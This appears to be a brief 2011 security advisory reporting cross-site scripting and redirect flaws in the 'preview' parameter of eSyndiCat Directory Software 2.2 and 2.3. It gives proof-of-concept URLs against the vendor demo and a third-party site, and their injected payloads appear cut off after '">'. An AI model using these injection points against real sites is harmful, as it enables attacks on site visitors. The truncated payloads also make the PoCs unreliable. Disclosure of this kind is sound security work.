eSyndiCat Directory Software ( preview= ) version 2.2 and 2.3 - Cross-Site Scripting ( XSS ) & Redirect http://www.esyndicat.com 30 - 01 - 2011 Avram Marius ( d3v1l ) http://twitter.com/securityshell - http://security-sh3ll.blogspot.com -------------------------------------------------------------------------- Poc: 1 XSS & Redirect on v.2.3 http://www.esyndicat.com/demo/?preview="> http://www.esyndicat.com/demo/?preview="> "" -------------------------------------------------------------------------- Poc: 2 XSS & Redirect on v.2.2 http://ekedai.net/date/2008/08/?preview="> http://ekedai.net/date/2008/08/?preview="> "" --------------------------------------------------------------------------